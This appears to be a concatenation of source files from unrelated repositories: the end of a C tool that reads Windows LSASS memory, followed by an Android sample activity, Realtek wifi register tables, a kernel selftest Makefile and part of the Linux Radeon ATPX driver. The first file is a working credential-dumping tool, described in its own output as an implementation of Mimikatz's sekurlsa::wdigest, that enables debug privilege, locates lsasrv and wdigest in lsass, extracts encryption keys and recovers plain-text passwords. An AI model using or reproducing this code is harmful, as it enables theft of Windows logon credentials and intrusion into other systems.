printf("[*] OS: Windows 10\n");
return 3;
}
SYSTEM_INFO info;
GetSystemInfo(&info);
OSVERSIONINFOEX os;
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
if (GetVersionEx((OSVERSIONINFO *)&os))
{
switch (os.dwMajorVersion)
{
case 6:
switch (os.dwMinorVersion)
{
case 0:
if (os.wProductType == VER_NT_WORKSTATION) {
printf("[*] OS: Windows Vista\n");
return 1;
}
else {
printf("[*] OS: Windows Server 2008\n");
return 1;
}
case 1:
if (os.wProductType == VER_NT_WORKSTATION)
printf("[*] OS: Windows 7\n");
else
printf("[*] OS:Windows Windows Server 2008 R2\n");
return 1;
case 2:
if (os.wProductType == VER_NT_WORKSTATION)
printf("[*] OS: Windows 8\n");
else
printf("[*] OS: Windows Server 2012\n");
return 2;
}
break;
default:
printf("[!] Too old\n");
}
}
else
printf("[!] Error\n");
return 0;
}
int main()
{
printf("\nUse to get plain-text credentials of the 64-bit OS.\n");
printf("This is a simple implementation of Mimikatz's sekurlsa::wdigest\n\n");
printf("Support:\n");
printf(" - Win7 x64/Windows Server 2008 x64/Windows Server 2008R2 x64\n");
printf(" - Win8 x64/Windows Server 2012 x64/Windows Server 2012R2 x64\n");
printf(" - Win10_1507(and before 1903) x64\n\n");
printf("Source: https://gist.github.com/xpn/12a6907a2fce97296428221b3bd3b394 \n");
printf("The following functions have been added:\n");
printf(" - EnableDebugPrivilege\n");
printf(" - GetOSVersion\n");
printf(" - Support different OS\n\n");
if (!EnableDebugPrivilege(TRUE))
{
printf("[!]AdjustTokenPrivileges Failed.<%d>\n", GetLastError());
}
HANDLE hLsass;
HMODULE lsassDll[1024];
DWORD bytesReturned;
char modName[MAX_PATH];
char* lsass = NULL, *lsasrv = NULL, *wdigest = NULL;
// Enum LSASS like pypykatz and open up a PROCESS_QUERY_INFORMATION | PROCESS_VM_READ handle to lsass process
hLsass = enum_lsass_handles();
if (hLsass == INVALID_HANDLE_VALUE) {
printf("[x] Error: Could not open handle to lsass process\n");
return 1;
}
// Enumerate all loaded modules within lsass process
if (EnumProcessModules(hLsass, lsassDll, sizeof(lsassDll), &bytesReturned)) {
// For each DLL address, get its name so we can find what we are looking for
for (int i = 0; i < bytesReturned / sizeof(HMODULE); i++) {
GetModuleFileNameExA(hLsass, lsassDll[i], modName, sizeof(modName));
// Find DLL's we want to hunt for signatures within
if (strstr(modName, "lsass.exe") != (char*)0)
lsass = (char*)lsassDll[i];
else if (strstr(modName, "wdigest.DLL") != (char*)0)
wdigest = (char*)lsassDll[i];
else if (strstr(modName, "lsasrv.dll") != (char*)0)
lsasrv = (char*)lsassDll[i];
}
}
else
{
printf("[!]Error code of EnumProcessModules():%d\n", GetLastError());
return 0;
}
// Make sure we have all the DLLs that we require
if (lsass == NULL || wdigest == NULL || lsasrv == NULL) {
printf("[x] Error: Could not find all DLL's in LSASS :(\n");
return 1;
}
printf("[*] lsass.exe found at %p\n", lsass);
printf("[*] wdigest.dll found at %p\n", wdigest);
printf("[*] lsasrv.dll found at %p\n", lsasrv);
// Now we need to search through lsass for the AES, 3DES, and IV values
int flag = GetOSVersion();
if (flag == 0)
return 0;
else if (flag == 1) {
if (FindKeysOnWin7(hLsass, lsasrv) != 0) {
printf("[x] Error: Could not find keys in lsass\n");
return 1;
}
}
else if (flag == 2) {
BYTE keyIVSig[] = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x44, 0x8b, 0x4d, 0xd8, 0x48, 0x8b, 0x0d };
if (FindKeysOnWin8(hLsass, lsasrv) != 0) {
printf("[x] Error: Could not find keys in lsass\n");
return 1;
}
}
else if (flag == 3) {
//For Win10_1507
if (FindKeysOnWin10(hLsass, lsasrv) != 0) {
printf("[x] Error: Could not find keys in lsass\n");
return 1;
}
}
// With keys extracted, we can extract credentials from memory
if (FindCredentials(hLsass, wdigest) != 0) {
printf("[x] Error: Could not find credentials in lsass\n");
return 1;
}
}
| kartikdurg/Enum-LSASS |
<|start_filename|>sample-app/src/main/java/com/dicedmelon/example/android/MainActivity.java<|end_filename|>
package com.dicedmelon.example.android;
import androidx.databinding.DataBindingUtil;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import com.dicedmelon.example.android.databinding.ActivityMainBinding;
public class MainActivity extends AppCompatActivity {
@Override protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
ActivityMainBinding viewDataBinding =
DataBindingUtil.setContentView(this, R.layout.activity_main);
NumberProvider numberProvider = new NumberProvider();
viewDataBinding.setNumber(numberProvider.provideNumber());
}
}
| tzltdc/example-android |
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/table.c<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* Created on 2010/ 5/18, 1:41
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#include "table.h"
u32 RTL8723BEPHY_REG_1TARRAY[] = {
0x800, 0x80040000,
0x804, 0x00000003,
0x808, 0x0000FC00,
0x80C, 0x0000000A,
0x810, 0x10001331,
0x814, 0x020C3D10,
0x818, 0x02200385,
0x81C, 0x00000000,
0x820, 0x01000100,
0x824, 0x00390204,
0x828, 0x00000000,
0x82C, 0x00000000,
0x830, 0x00000000,
0x834, 0x00000000,
0x838, 0x00000000,
0x83C, 0x00000000,
0x840, 0x00010000,
0x844, 0x00000000,
0x848, 0x00000000,
0x84C, 0x00000000,
0x850, 0x00000000,
0x854, 0x00000000,
0x858, 0x569A11A9,
0x85C, 0x01000014,
0x860, 0x66F60110,
0x864, 0x061F0649,
0x868, 0x00000000,
0x86C, 0x27272700,
0x870, 0x07000760,
0x874, 0x25004000,
0x878, 0x00000808,
0x87C, 0x00000000,
0x880, 0xB0000C1C,
0x884, 0x00000001,
0x888, 0x00000000,
0x88C, 0xCCC000C0,
0x890, 0x00000800,
0x894, 0xFFFFFFFE,
0x898, 0x40302010,
0x89C, 0x00706050,
0x900, 0x00000000,
0x904, 0x00000023,
0x908, 0x00000000,
0x90C, 0x81121111,
0x910, 0x00000002,
0x914, 0x00000201,
0x948, 0x00000000,
0xA00, 0x00D047C8,
0xA04, 0x80FF000C,
0xA08, 0x8C838300,
0xA0C, 0x2E7F120F,
0xA10, 0x9500BB78,
0xA14, 0x1114D028,
0xA18, 0x00881117,
0xA1C, 0x89140F00,
0xA20, 0x1A1B0000,
0xA24, 0x090E1317,
0xA28, 0x00000204,
0xA2C, 0x00D30000,
0xA70, 0x101FBF00,
0xA74, 0x00000007,
0xA78, 0x00000900,
0xA7C, 0x225B0606,
0xA80, 0x21806490,
0xB2C, 0x00000000,
0xC00, 0x48071D40,
0xC04, 0x03A05611,
0xC08, 0x000000E4,
0xC0C, 0x6C6C6C6C,
0xC10, 0x08800000,
0xC14, 0x40000100,
0xC18, 0x08800000,
0xC1C, 0x40000100,
0xC20, 0x00000000,
0xC24, 0x00000000,
0xC28, 0x00000000,
0xC2C, 0x00000000,
0xC30, 0x69E9AC44,
0xC34, 0x469652AF,
0xC38, 0x49795994,
0xC3C, 0x0A97971C,
0xC40, 0x1F7C403F,
0xC44, 0x000100B7,
0xC48, 0xEC020107,
0xC4C, 0x007F037F,
0xC50, 0x69553420,
0xC54, 0x43BC0094,
0xC58, 0x00023169,
0xC5C, 0x00250492,
0xC60, 0x00000000,
0xC64, 0x7112848B,
0xC68, 0x47C00BFF,
0xC6C, 0x00000036,
0xC70, 0x2C7F000D,
0xC74, 0x020610DB,
0xC78, 0x0000001F,
0xC7C, 0x00B91612,
0xC80, 0x390000E4,
0xC84, 0x20F60000,
0xC88, 0x40000100,
0xC8C, 0x20200000,
0xC90, 0x00020E1A,
0xC94, 0x00000000,
0xC98, 0x00020E1A,
0xC9C, 0x00007F7F,
0xCA0, 0x00000000,
0xCA4, 0x000300A0,
0xCA8, 0x00000000,
0xCAC, 0x00000000,
0xCB0, 0x00000000,
0xCB4, 0x00000000,
0xCB8, 0x00000000,
0xCBC, 0x28000000,
0xCC0, 0x00000000,
0xCC4, 0x00000000,
0xCC8, 0x00000000,
0xCCC, 0x00000000,
0xCD0, 0x00000000,
0xCD4, 0x00000000,
0xCD8, 0x64B22427,
0xCDC, 0x00766932,
0xCE0, 0x00222222,
0xCE4, 0x00000000,
0xCE8, 0x37644302,
0xCEC, 0x2F97D40C,
0xD00, 0x00000740,
0xD04, 0x40020401,
0xD08, 0x0000907F,
0xD0C, 0x20010201,
0xD10, 0xA0633333,
0xD14, 0x3333BC53,
0xD18, 0x7A8F5B6F,
0xD2C, 0xCC979975,
0xD30, 0x00000000,
0xD34, 0x80608000,
0xD38, 0x00000000,
0xD3C, 0x00127353,
0xD40, 0x00000000,
0xD44, 0x00000000,
0xD48, 0x00000000,
0xD4C, 0x00000000,
0xD50, 0x6437140A,
0xD54, 0x00000000,
0xD58, 0x00000282,
0xD5C, 0x30032064,
0xD60, 0x4653DE68,
0xD64, 0x04518A3C,
0xD68, 0x00002101,
0xD6C, 0x2A201C16,
0xD70, 0x1812362E,
0xD74, 0x322C2220,
0xD78, 0x000E3C24,
0xE00, 0x2D2D2D2D,
0xE04, 0x2D2D2D2D,
0xE08, 0x0390272D,
0xE10, 0x2D2D2D2D,
0xE14, 0x2D2D2D2D,
0xE18, 0x2D2D2D2D,
0xE1C, 0x2D2D2D2D,
0xE28, 0x00000000,
0xE30, 0x1000DC1F,
0xE34, 0x10008C1F,
0xE38, 0x02140102,
0xE3C, 0x681604C2,
0xE40, 0x01007C00,
0xE44, 0x01004800,
0xE48, 0xFB000000,
0xE4C, 0x000028D1,
0xE50, 0x1000DC1F,
0xE54, 0x10008C1F,
0xE58, 0x02140102,
0xE5C, 0x28160D05,
0xE60, 0x00000008,
0xE68, 0x001B2556,
0xE6C, 0x00C00096,
0xE70, 0x00C00096,
0xE74, 0x01000056,
0xE78, 0x01000014,
0xE7C, 0x01000056,
0xE80, 0x01000014,
0xE84, 0x00C00096,
0xE88, 0x01000056,
0xE8C, 0x00C00096,
0xED0, 0x00C00096,
0xED4, 0x00C00096,
0xED8, 0x00C00096,
0xEDC, 0x000000D6,
0xEE0, 0x000000D6,
0xEEC, 0x01C00016,
0xF14, 0x00000003,
0xF4C, 0x00000000,
0xF00, 0x00000300,
0x820, 0x01000100,
0x800, 0x83040000,
};
u32 RTL8723BEPHY_REG_ARRAY_PG[] = {
0, 0, 0, 0x00000e08, 0x0000ff00, 0x00004000,
0, 0, 0, 0x0000086c, 0xffffff00, 0x34363800,
0, 0, 0, 0x00000e00, 0xffffffff, 0x42444646,
0, 0, 0, 0x00000e04, 0xffffffff, 0x30343840,
0, 0, 0, 0x00000e10, 0xffffffff, 0x38404244,
0, 0, 0, 0x00000e14, 0xffffffff, 0x26303436
};
u32 RTL8723BE_RADIOA_1TARRAY[] = {
0x000, 0x00010000,
0x0B0, 0x000DFFE0,
0x0FE, 0x00000000,
0x0FE, 0x00000000,
0x0FE, 0x00000000,
0x0B1, 0x00000018,
0x0FE, 0x00000000,
0x0FE, 0x00000000,
0x0FE, 0x00000000,
0x0B2, 0x00084C00,
0x0B5, 0x0000D2CC,
0x0B6, 0x000925AA,
0x0B7, 0x00000010,
0x0B8, 0x0000907F,
0x05C, 0x00000002,
0x07C, 0x00000002,
0x07E, 0x00000005,
0x08B, 0x0006FC00,
0x0B0, 0x000FF9F0,
0x01C, 0x000739D2,
0x01E, 0x00000000,
0x0DF, 0x00000780,
0x050, 0x00067435,
0x051, 0x0006B04E,
0x052, 0x000007D2,
0x053, 0x00000000,
0x054, 0x00050400,
0x055, 0x0004026E,
0x0DD, 0x0000004C,
0x070, 0x00067435,
0x071, 0x0006B04E,
0x072, 0x000007D2,
0x073, 0x00000000,
0x074, 0x00050400,
0x075, 0x0004026E,
0x0EF, 0x00000100,
0x034, 0x0000ADD7,
0x035, 0x00005C00,
0x034, 0x00009DD4,
0x035, 0x00005000,
0x034, 0x00008DD1,
0x035, 0x00004400,
0x034, 0x00007DCE,
0x035, 0x00003800,
0x034, 0x00006CD1,
0x035, 0x00004400,
0x034, 0x00005CCE,
0x035, 0x00003800,
0x034, 0x000048CE,
0x035, 0x00004400,
0x034, 0x000034CE,
0x035, 0x00003800,
0x034, 0x00002451,
0x035, 0x00004400,
0x034, 0x0000144E,
0x035, 0x00003800,
0x034, 0x00000051,
0x035, 0x00004400,
0x0EF, 0x00000000,
0x0EF, 0x00000100,
0x0ED, 0x00000010,
0x044, 0x0000ADD7,
0x044, 0x00009DD4,
0x044, 0x00008DD1,
0x044, 0x00007DCE,
0x044, 0x00006CC1,
0x044, 0x00005CCE,
0x044, 0x000044D1,
0x044, 0x000034CE,
0x044, 0x00002451,
0x044, 0x0000144E,
0x044, 0x00000051,
0x0EF, 0x00000000,
0x0ED, 0x00000000,
0x0EF, 0x00002000,
0x03B, 0x000380EF,
0x03B, 0x000302FE,
0x03B, 0x00028CE6,
0x03B, 0x000200BC,
0x03B, 0x000188A5,
0x03B, 0x00010FBC,
0x03B, 0x00008F71,
0x03B, 0x00000900,
0x0EF, 0x00000000,
0x0ED, 0x00000001,
0x040, 0x000380EF,
0x040, 0x000302FE,
0x040, 0x00028CE6,
0x040, 0x000200BC,
0x040, 0x000188A5,
0x040, 0x00010FBC,
0x040, 0x00008F71,
0x040, 0x00000900,
0x0ED, 0x00000000,
0x082, 0x00080000,
0x083, 0x00008000,
0x084, 0x00048D80,
0x085, 0x00068000,
0x0A2, 0x00080000,
0x0A3, 0x00008000,
0x0A4, 0x00048D80,
0x0A5, 0x00068000,
0x000, 0x00033D80,
};
u32 RTL8723BEMAC_1T_ARRAY[] = {
0x02F, 0x00000030,
0x035, 0x00000000,
0x428, 0x0000000A,
0x429, 0x00000010,
0x430, 0x00000000,
0x431, 0x00000000,
0x432, 0x00000000,
0x433, 0x00000001,
0x434, 0x00000004,
0x435, 0x00000005,
0x436, 0x00000007,
0x437, 0x00000008,
0x43C, 0x00000004,
0x43D, 0x00000005,
0x43E, 0x00000007,
0x43F, 0x00000008,
0x440, 0x0000005D,
0x441, 0x00000001,
0x442, 0x00000000,
0x444, 0x00000010,
0x445, 0x00000000,
0x446, 0x00000000,
0x447, 0x00000000,
0x448, 0x00000000,
0x449, 0x000000F0,
0x44A, 0x0000000F,
0x44B, 0x0000003E,
0x44C, 0x00000010,
0x44D, 0x00000000,
0x44E, 0x00000000,
0x44F, 0x00000000,
0x450, 0x00000000,
0x451, 0x000000F0,
0x452, 0x0000000F,
0x453, 0x00000000,
0x456, 0x0000005E,
0x460, 0x00000066,
0x461, 0x00000066,
0x4C8, 0x000000FF,
0x4C9, 0x00000008,
0x4CC, 0x000000FF,
0x4CD, 0x000000FF,
0x4CE, 0x00000001,
0x500, 0x00000026,
0x501, 0x000000A2,
0x502, 0x0000002F,
0x503, 0x00000000,
0x504, 0x00000028,
0x505, 0x000000A3,
0x506, 0x0000005E,
0x507, 0x00000000,
0x508, 0x0000002B,
0x509, 0x000000A4,
0x50A, 0x0000005E,
0x50B, 0x00000000,
0x50C, 0x0000004F,
0x50D, 0x000000A4,
0x50E, 0x00000000,
0x50F, 0x00000000,
0x512, 0x0000001C,
0x514, 0x0000000A,
0x516, 0x0000000A,
0x525, 0x0000004F,
0x550, 0x00000010,
0x551, 0x00000010,
0x559, 0x00000002,
0x55C, 0x00000050,
0x55D, 0x000000FF,
0x605, 0x00000030,
0x608, 0x0000000E,
0x609, 0x0000002A,
0x620, 0x000000FF,
0x621, 0x000000FF,
0x622, 0x000000FF,
0x623, 0x000000FF,
0x624, 0x000000FF,
0x625, 0x000000FF,
0x626, 0x000000FF,
0x627, 0x000000FF,
0x638, 0x00000050,
0x63C, 0x0000000A,
0x63D, 0x0000000A,
0x63E, 0x0000000E,
0x63F, 0x0000000E,
0x640, 0x00000040,
0x642, 0x00000040,
0x643, 0x00000000,
0x652, 0x000000C8,
0x66E, 0x00000005,
0x700, 0x00000021,
0x701, 0x00000043,
0x702, 0x00000065,
0x703, 0x00000087,
0x708, 0x00000021,
0x709, 0x00000043,
0x70A, 0x00000065,
0x70B, 0x00000087,
};
u32 RTL8723BEAGCTAB_1TARRAY[] = {
0xC78, 0xFD000001,
0xC78, 0xFC010001,
0xC78, 0xFB020001,
0xC78, 0xFA030001,
0xC78, 0xF9040001,
0xC78, 0xF8050001,
0xC78, 0xF7060001,
0xC78, 0xF6070001,
0xC78, 0xF5080001,
0xC78, 0xF4090001,
0xC78, 0xF30A0001,
0xC78, 0xF20B0001,
0xC78, 0xF10C0001,
0xC78, 0xF00D0001,
0xC78, 0xEF0E0001,
0xC78, 0xEE0F0001,
0xC78, 0xED100001,
0xC78, 0xEC110001,
0xC78, 0xEB120001,
0xC78, 0xEA130001,
0xC78, 0xE9140001,
0xC78, 0xE8150001,
0xC78, 0xE7160001,
0xC78, 0xAA170001,
0xC78, 0xA9180001,
0xC78, 0xA8190001,
0xC78, 0xA71A0001,
0xC78, 0xA61B0001,
0xC78, 0xA51C0001,
0xC78, 0xA41D0001,
0xC78, 0xA31E0001,
0xC78, 0x671F0001,
0xC78, 0x66200001,
0xC78, 0x65210001,
0xC78, 0x64220001,
0xC78, 0x63230001,
0xC78, 0x62240001,
0xC78, 0x61250001,
0xC78, 0x47260001,
0xC78, 0x46270001,
0xC78, 0x45280001,
0xC78, 0x44290001,
0xC78, 0x432A0001,
0xC78, 0x422B0001,
0xC78, 0x292C0001,
0xC78, 0x282D0001,
0xC78, 0x272E0001,
0xC78, 0x262F0001,
0xC78, 0x25300001,
0xC78, 0x24310001,
0xC78, 0x09320001,
0xC78, 0x08330001,
0xC78, 0x07340001,
0xC78, 0x06350001,
0xC78, 0x05360001,
0xC78, 0x04370001,
0xC78, 0x03380001,
0xC78, 0x02390001,
0xC78, 0x013A0001,
0xC78, 0x003B0001,
0xC78, 0x003C0001,
0xC78, 0x003D0001,
0xC78, 0x003E0001,
0xC78, 0x003F0001,
0xC78, 0xFC400001,
0xC78, 0xFB410001,
0xC78, 0xFA420001,
0xC78, 0xF9430001,
0xC78, 0xF8440001,
0xC78, 0xF7450001,
0xC78, 0xF6460001,
0xC78, 0xF5470001,
0xC78, 0xF4480001,
0xC78, 0xF3490001,
0xC78, 0xF24A0001,
0xC78, 0xF14B0001,
0xC78, 0xF04C0001,
0xC78, 0xEF4D0001,
0xC78, 0xEE4E0001,
0xC78, 0xED4F0001,
0xC78, 0xEC500001,
0xC78, 0xEB510001,
0xC78, 0xEA520001,
0xC78, 0xE9530001,
0xC78, 0xE8540001,
0xC78, 0xE7550001,
0xC78, 0xE6560001,
0xC78, 0xE5570001,
0xC78, 0xAA580001,
0xC78, 0xA9590001,
0xC78, 0xA85A0001,
0xC78, 0xA75B0001,
0xC78, 0xA65C0001,
0xC78, 0xA55D0001,
0xC78, 0xA45E0001,
0xC78, 0x675F0001,
0xC78, 0x66600001,
0xC78, 0x65610001,
0xC78, 0x64620001,
0xC78, 0x63630001,
0xC78, 0x62640001,
0xC78, 0x61650001,
0xC78, 0x47660001,
0xC78, 0x46670001,
0xC78, 0x45680001,
0xC78, 0x44690001,
0xC78, 0x436A0001,
0xC78, 0x426B0001,
0xC78, 0x296C0001,
0xC78, 0x286D0001,
0xC78, 0x276E0001,
0xC78, 0x266F0001,
0xC78, 0x25700001,
0xC78, 0x24710001,
0xC78, 0x09720001,
0xC78, 0x08730001,
0xC78, 0x07740001,
0xC78, 0x06750001,
0xC78, 0x05760001,
0xC78, 0x04770001,
0xC78, 0x03780001,
0xC78, 0x02790001,
0xC78, 0x017A0001,
0xC78, 0x007B0001,
0xC78, 0x007C0001,
0xC78, 0x007D0001,
0xC78, 0x007E0001,
0xC78, 0x007F0001,
0xC50, 0x69553422,
0xC50, 0x69553420,
};
<|start_filename|>linux-3.16/tools/testing/selftests/cpu-hotplug/Makefile<|end_filename|>
all:
run_tests:
@/bin/bash ./on-off-test.sh || echo "cpu-hotplug selftests: [FAIL]"
clean:
<|start_filename|>linux-3.16/drivers/gpu/drm/radeon/radeon_atpx_handler.c<|end_filename|>
/*
* Copyright (c) 2010 Red Hat Inc.
* Author : <NAME> <<EMAIL>>
*
* Licensed under GPLv2
*
* ATPX support for both Intel/ATI
*/
#include <linux/vga_switcheroo.h>
#include <linux/slab.h>
#include <linux/acpi.h>
#include <linux/pci.h>
#include "radeon_acpi.h"
struct radeon_atpx_functions {
bool px_params;
bool power_cntl;
bool disp_mux_cntl;
bool i2c_mux_cntl;
bool switch_start;
bool switch_end;
bool disp_connectors_mapping;
bool disp_detetion_ports;
};
struct radeon_atpx {
acpi_handle handle;
struct radeon_atpx_functions functions;
};
static struct radeon_atpx_priv {
bool atpx_detected;
/* handle for device - and atpx */
acpi_handle dhandle;
acpi_handle other_handle;
struct radeon_atpx atpx;
} radeon_atpx_priv;
struct atpx_verify_interface {
u16 size; /* structure size in bytes (includes size field) */
u16 version; /* version */
u32 function_bits; /* supported functions bit vector */
} __packed;
struct atpx_px_params {
u16 size; /* structure size in bytes (includes size field) */
u32 valid_flags; /* which flags are valid */
u32 flags; /* flags */
} __packed;
struct atpx_power_control {
u16 size;
u8 dgpu_state;
} __packed;
struct atpx_mux {
u16 size;
u16 mux;
} __packed;
bool radeon_has_atpx(void) {
return radeon_atpx_priv.atpx_detected;
}
/**
* radeon_atpx_call - call an ATPX method
*
* @handle: acpi handle
* @function: the ATPX function to execute
* @params: ATPX function params
*
* Executes the requested ATPX function (all asics).
* Returns a pointer to the acpi output buffer.
*/
static union acpi_object *radeon_atpx_call(acpi_handle handle, int function,
struct acpi_buffer *params)
{
acpi_status status;
union acpi_object atpx_arg_elements[2];
struct acpi_object_list atpx_arg;
struct acpi_buffer buffer = { ACPI_ALLOCATE_BUFFER, NULL };
atpx_arg.count = 2;
atpx_arg.pointer = &atpx_arg_elements[0];
atpx_arg_elements[0].type = ACPI_TYPE_INTEGER;
atpx_arg_elements[0].integer.value = function;
if (params) {
atpx_arg_elements[1].type = ACPI_TYPE_BUFFER;
atpx_arg_elements[1].buffer.length = params->length;
atpx_arg_elements[1].buffer.pointer = params->pointer;
} else {
/* We need a second fake parameter */
atpx_arg_elements[1].type = ACPI_TYPE_INTEGER;
atpx_arg_elements[1].integer.value = 0;
}
status = acpi_evaluate_object(handle, NULL, &atpx_arg, &buffer);
/* Fail only if calling the method fails and ATPX is supported */
if (ACPI_FAILURE(status) && status != AE_NOT_FOUND) {
printk("failed to evaluate ATPX got %s\n",
acpi_format_exception(status));
kfree(buffer.pointer);
return NULL;
}
return buffer.pointer;
}
/**
* radeon_atpx_parse_functions - parse supported functions
*
* @f: supported functions struct
* @mask: supported functions mask from ATPX
*
* Use the supported functions mask from ATPX function
* ATPX_FUNCTION_VERIFY_INTERFACE to determine what functions
* are supported (all asics).
*/
static void radeon_atpx_parse_functions(struct radeon_atpx_functions *f, u32 mask)
{
f->px_params = mask & ATPX_GET_PX_PARAMETERS_SUPPORTED;
f->power_cntl = mask & ATPX_POWER_CONTROL_SUPPORTED;
f->disp_mux_cntl = mask & ATPX_DISPLAY_MUX_CONTROL_SUPPORTED;
f->i2c_mux_cntl = mask & ATPX_I2C_MUX_CONTROL_SUPPORTED;
f->switch_start = mask & ATPX_GRAPHICS_DEVICE_SWITCH_START_NOTIFICATION_SUPPORTED;
f->switch_end = mask & ATPX_GRAPHICS_DEVICE_SWITCH_END_NOTIFICATION_SUPPORTED;
f->disp_connectors_mapping = mask & ATPX_GET_DISPLAY_CONNECTORS_MAPPING_SUPPORTED;
f->disp_detetion_ports = mask & ATPX_GET_DISPLAY_DETECTION_PORTS_SUPPORTED;
}
/**
* radeon_atpx_validate_functions - validate ATPX functions
*
* @atpx: radeon atpx struct
*
* Validate that required functions are enabled (all asics).
* returns 0 on success, error on failure.
*/
static int radeon_atpx_validate(struct radeon_atpx *atpx)
{
/* make sure required functions are enabled */
/* dGPU power control is required */
atpx->functions.power_cntl = true;
if (atpx->functions.px_params) {
union acpi_object *info;
struct atpx_px_params output;
size_t size;
u32 valid_bits;
info = radeon_atpx_call(atpx->handle, ATPX_FUNCTION_GET_PX_PARAMETERS, NULL);
if (!info)
return -EIO;
memset(&output, 0, sizeof(output));
size = *(u16 *) info->buffer.pointer;
if (size < 10) {
printk("ATPX buffer is too small: %zu\n", size);
kfree(info);
return -EINVAL;
}
size = min(sizeof(output), size);
memcpy(&output, info->buffer.pointer, size);
valid_bits = output.flags & output.valid_flags;
/* if separate mux flag is set, mux controls are required */
if (valid_bits & ATPX_SEPARATE_MUX_FOR_I2C) {
atpx->functions.i2c_mux_cntl = true;
atpx->functions.disp_mux_cntl = true;
}
/* if any outputs are muxed, mux controls are required */
if (valid_bits & (ATPX_CRT1_RGB_SIGNAL_MUXED |
ATPX_TV_SIGNAL_MUXED |
ATPX_DFP_SIGNAL_MUXED))
atpx->functions.disp_mux_cntl = true;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_verify_interface - verify ATPX
*
* @atpx: radeon atpx struct
*
* Execute the ATPX_FUNCTION_VERIFY_INTERFACE ATPX function
* to initialize ATPX and determine what features are supported
* (all asics).
* returns 0 on success, error on failure.
*/
static int radeon_atpx_verify_interface(struct radeon_atpx *atpx)
{
union acpi_object *info;
struct atpx_verify_interface output;
size_t size;
int err = 0;
info = radeon_atpx_call(atpx->handle, ATPX_FUNCTION_VERIFY_INTERFACE, NULL);
if (!info)
return -EIO;
memset(&output, 0, sizeof(output));
size = *(u16 *) info->buffer.pointer;
if (size < 8) {
printk("ATPX buffer is too small: %zu\n", size);
err = -EINVAL;
goto out;
}
size = min(sizeof(output), size);
memcpy(&output, info->buffer.pointer, size);
/* TODO: check version? */
printk("ATPX version %u, functions 0x%08x\n",
output.version, output.function_bits);
radeon_atpx_parse_functions(&atpx->functions, output.function_bits);
out:
kfree(info);
return err;
}
/**
* radeon_atpx_set_discrete_state - power up/down discrete GPU
*
* @atpx: atpx info struct
* @state: discrete GPU state (0 = power down, 1 = power up)
*
* Execute the ATPX_FUNCTION_POWER_CONTROL ATPX function to
* power down/up the discrete GPU (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_set_discrete_state(struct radeon_atpx *atpx, u8 state)
{
struct acpi_buffer params;
union acpi_object *info;
struct atpx_power_control input;
if (atpx->functions.power_cntl) {
input.size = 3;
input.dgpu_state = state;
params.length = input.size;
params.pointer = &input;
info = radeon_atpx_call(atpx->handle,
ATPX_FUNCTION_POWER_CONTROL,
¶ms);
if (!info)
return -EIO;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_switch_disp_mux - switch display mux
*
* @atpx: atpx info struct
* @mux_id: mux state (0 = integrated GPU, 1 = discrete GPU)
*
* Execute the ATPX_FUNCTION_DISPLAY_MUX_CONTROL ATPX function to
* switch the display mux between the discrete GPU and integrated GPU
* (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_switch_disp_mux(struct radeon_atpx *atpx, u16 mux_id)
{
struct acpi_buffer params;
union acpi_object *info;
struct atpx_mux input;
if (atpx->functions.disp_mux_cntl) {
input.size = 4;
input.mux = mux_id;
params.length = input.size;
params.pointer = &input;
info = radeon_atpx_call(atpx->handle,
ATPX_FUNCTION_DISPLAY_MUX_CONTROL,
¶ms);
if (!info)
return -EIO;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_switch_i2c_mux - switch i2c/hpd mux
*
* @atpx: atpx info struct
* @mux_id: mux state (0 = integrated GPU, 1 = discrete GPU)
*
* Execute the ATPX_FUNCTION_I2C_MUX_CONTROL ATPX function to
* switch the i2c/hpd mux between the discrete GPU and integrated GPU
* (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_switch_i2c_mux(struct radeon_atpx *atpx, u16 mux_id)
{
struct acpi_buffer params;
union acpi_object *info;
struct atpx_mux input;
if (atpx->functions.i2c_mux_cntl) {
input.size = 4;
input.mux = mux_id;
params.length = input.size;
params.pointer = &input;
info = radeon_atpx_call(atpx->handle,
ATPX_FUNCTION_I2C_MUX_CONTROL,
¶ms);
if (!info)
return -EIO;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_switch_start - notify the sbios of a GPU switch
*
* @atpx: atpx info struct
* @mux_id: mux state (0 = integrated GPU, 1 = discrete GPU)
*
* Execute the ATPX_FUNCTION_GRAPHICS_DEVICE_SWITCH_START_NOTIFICATION ATPX
* function to notify the sbios that a switch between the discrete GPU and
* integrated GPU has begun (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_switch_start(struct radeon_atpx *atpx, u16 mux_id)
{
struct acpi_buffer params;
union acpi_object *info;
struct atpx_mux input;
if (atpx->functions.switch_start) {
input.size = 4;
input.mux = mux_id;
params.length = input.size;
params.pointer = &input;
info = radeon_atpx_call(atpx->handle,
ATPX_FUNCTION_GRAPHICS_DEVICE_SWITCH_START_NOTIFICATION,
¶ms);
if (!info)
return -EIO;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_switch_end - notify the sbios of a GPU switch
*
* @atpx: atpx info struct
* @mux_id: mux state (0 = integrated GPU, 1 = discrete GPU)
*
* Execute the ATPX_FUNCTION_GRAPHICS_DEVICE_SWITCH_END_NOTIFICATION ATPX
* function to notify the sbios that a switch between the discrete GPU and
* integrated GPU has ended (all asics).
* Returns 0 on success, error on failure.
*/
